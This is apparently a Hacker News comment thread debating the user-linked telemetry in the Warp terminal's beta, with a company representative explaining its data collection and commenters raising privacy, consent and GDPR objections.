I'd be supportive of "report issue" buttons (I'd use them, yes), and occasional "Hey, you've used this app for a week/two/month, may we send some telemetry? We need it to better understand how the app is used. Here's the data, is it OK to upload it?" prompts. Yes, as long as I don't see anything sensitive in the payload - it sure is okay, you respect me and I respect you (with bonus points for politely asking); and I'll be sure to reaching out if I'd see anything sensitive.
Phoning home from the get-go for anything but an anonymous update check and requiring some account is a hard "no".
I definitely understand the concerns. For our public beta, we do send telemetry and associate it with the logged in user because it makes it much easier to reach out and get feedback when something goes wrong. But we only track metadata, never console output. For an exhaustive list of events that we track, see here: https://docs.warp.dev/getting-started/privacy#exhaustive-tel.... Once we hit general availability, our plan is to make telemetry completely opt-in and anonymous.
Wow, this is just unbelievable. You don't say anywhere on your privacy page that you are associating this data with specific users.
Everything your company says regarding privacy seems to be a complete lie. You contradict yourselves everywhere. As a security officer I would never allow any company whose security I run to use your product- even if you fix this issues now who knows if you're going to lie again in the future.
Trust is hard to regain once lost, and your company definitely blew it here.
This looks very interesting to me, but some of this telemetry is a deal breaker. On your privacy page, it says "Our general philosophy is complete transparency and control of any data leaving your machine." If I have complete control of any data leaving my machine, can I opt to turn off the telemetry entirely?
That's an important callout! By console output, we really mean output from the pseudoterminal, which includes command input and output printed to the terminal.
We don't store any content of _any_ part of a command that's executed in Warp.
That's a ton of data being collected. I would rather much have this submitted during a crash, rather than opt-in/opt-out. I'd not want to use a terminal that has data collection that crosses the internet every time I use it.
Totally understand if you don't feel comfortable using it!
The reason we don't submit this only during a crash, is because there are a lot of other things we want to know about users like: Which features are they using? Are they sticking to warp as their daily driver? How much time do they spend in the app?
We do want to make the telemetry opt-in after Warp is out of beta.
There are better ways to gather feedback, even if your application is in beta. Most loyal customers will let you know what’s wrong and what features they’re most excited about- that honest feedback is far superior than telemetry data. You can even add a survey form after the application exits to try and maximize the feedback loop.
Totally understand you’re a new venture backed business, however, you most likely are targeting the wrong group of users by automatically sending data over the internet for “no reason”.
> Most loyal customers will let you know what’s wrong and what features they’re most excited about- that honest feedback is far superior than telemetry data
That's just wrong. Very few users, regardless of loyalty, would bother sending feedback. That's why many companies have drives with gift cards or whatever as reward for participating in giving feedback. And even then, you'd get a limited subset of users ( loyal, loud, with time available to waste) instead of everyone like with telemetry.
We don’t know about any shells outside of Warp so technically, they could also using other terminals - but that’s enough info for our product development.
We never track the contents of commands. A full telemetry table is included in our user docs.
I definitely will not try it if the analytics part are not optional, though I am glad to see you're documenting exactly what gets sent. I might consider trying it and even opt-in to the analytics once you make it optional.
At least for EU users, you cannot collect information like this without the explicit consent of those users.
It's 2022 FFS, and still companies are over-stepping the mark - companies behaving like yours are exactly the reason GDPR and ePrivacy etc exist in the first place :/
> I really wanted to like it, too. The screenshots look great
My thoughts exactly. I don't use potential keyloggers on my browser (think grammarly or similar), I'm not going to install a terminal making requests or getting my data as I use it.
You could use a layer 7 firewall for this purpose. I use Little Snitch on macOS and Opensnitch on Linux. Given this application is macOS only right now, I would bet OP used LS since its popular on macOS.
Just FYI, sentry is error capturing and reporting tool, not "telemetry". It could be potentially abused to collect "telemetry", but there are far better tools for that so it'd make little sense IMHO. I've used it extensively for error management in a previous job and it worked very well, correlating with env, release, etc. and it was great ( it was the self-hosted version, but still). Not affiliated in any way, just a happy "customer" ( never paid so not really a customer).
As a user of sentry technically, you're also aware of how difficult it is to keep user information out of those errors and stacktraces. Just paths are enough to start leaking information about you and your system that just shouldn't leak from your terminal to the internet.
Come on. You must realize VS Code and basically every website you use collects telemetry data, which is rarely for anything nefarious except product improvements. If GitHub/Microsoft had released this product, would you be raising the same concerns?
Maybe not but I'd trust Microsoft has a decent security and privacy team working on this more than a startup. What if they're logging the wrong stuff and my data is leaked?
Yeah but if Microsoft fuck up badly enough I can sue them, startups are less likely to survive a significant breach (especially if the thing being breached is 100% of their product). There's just far less risk.
I use VS Codium for this reason and self host git so yeah for me that's definitely a thing. And I have a ton of stuff to block as much telemetry from other software and websites as I can, including on mobile.
It's not for everyone but yes there are still Don Quixotes like me fighting the army of windmills :)
I suspect the proportion of us here at HN is pretty high too.
A remote system by definition has access to the information you give them and you should manage that carefully. Meanwhile your filesystem has access to your entire life, heart, and mind unvarnished, edited, and unsegregated with ephemera alongside the deep facts of your mind.
Microsoft is a criminal enterprise that relatively recently got god to a degree and actually started caring about their image at home while still facilitating crime and corruption abroad. The fact that many are stupid enough to trust them with their data does not imply that this is a reasonable choice.
Unless you know something about the protocol that I don't (quite possible), it's not silent: all you devices get "new device registered to iMessage" dialog box.
Since Apple operates the key service and there is no key transparency mechanism, they could certainly do it (technically) with only a server side change.